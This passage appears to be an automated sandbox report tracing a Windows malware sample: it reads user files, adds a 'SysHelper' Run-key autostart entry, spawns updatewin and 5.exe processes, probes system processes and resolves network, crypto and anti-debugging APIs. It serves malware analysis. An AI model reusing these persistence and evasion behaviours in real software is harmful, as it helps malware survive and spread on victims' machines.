Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url size = 153605, size_out = 133 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\AwfOXmr1.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\AwfOXmr1.mp3 size = 153605, size_out = 64329 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\hd0rzFg.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\hd0rzFg.m4a size = 153605, size_out = 17115 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\j34KVbd 7j.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\j34KVbd 7j.mp3 size = 153605, size_out = 66657 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\KeEk_O9.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\KeEk_O9.mp3 size = 153605, size_out = 34226 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ol37DpMB ADCzniH6.docx size = 50527 True 1
Fn
Data
For performance reasons, the remaining 666 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion value_name = SysHelper, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion value_name = SysHelper, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (48)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\5.exe show_window = SW_SHOWNORMAL True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\common files\plannedrespondents.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\google\actor-suggesting.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows media player\knives.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows photo viewer\reward stan distances.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft analysis services\corporations verse fetish.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\reference assemblies\merger.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows photo viewer\ideas.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows photo viewer\portion-sunday.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft visual studio 8\combat_univ.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft sql server compact edition\paul dancing za.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\internet explorer\artistscomplicated.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\consortiumdressinglou.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\implications cheque folders.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows defender\msie_banners.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\yard-assessing-fraction.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\rundll32.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows nt\genre-heaven.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module (406)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 3
Fn
Load RPCRT4.dll base_address = 0x75ee0000 True 1
Fn
Load MPR.dll base_address = 0x74b20000 True 1
Fn
Load WININET.dll base_address = 0x753d0000 True 1
Fn
Load WINMM.dll base_address = 0x74ae0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75220000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74b40000 True 1
Fn
Load WS2_32.dll base_address = 0x75bc0000 True 1
Fn
Load DNSAPI.dll base_address = 0x74a70000 True 1
Fn
Load CRYPT32.dll base_address = 0x759b0000 True 1
Fn
Load msvcr100.dll base_address = 0x749b0000 True 1
Fn
Load Psapi.dll base_address = 0x75140000 True 1
Fn
Load Shell32.dll base_address = 0x75fd0000 True 59
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 3
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x74b22dd6 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x74b22f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x74b23058 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74ae26e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadConsoleW, address_out = 0x76cd739a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
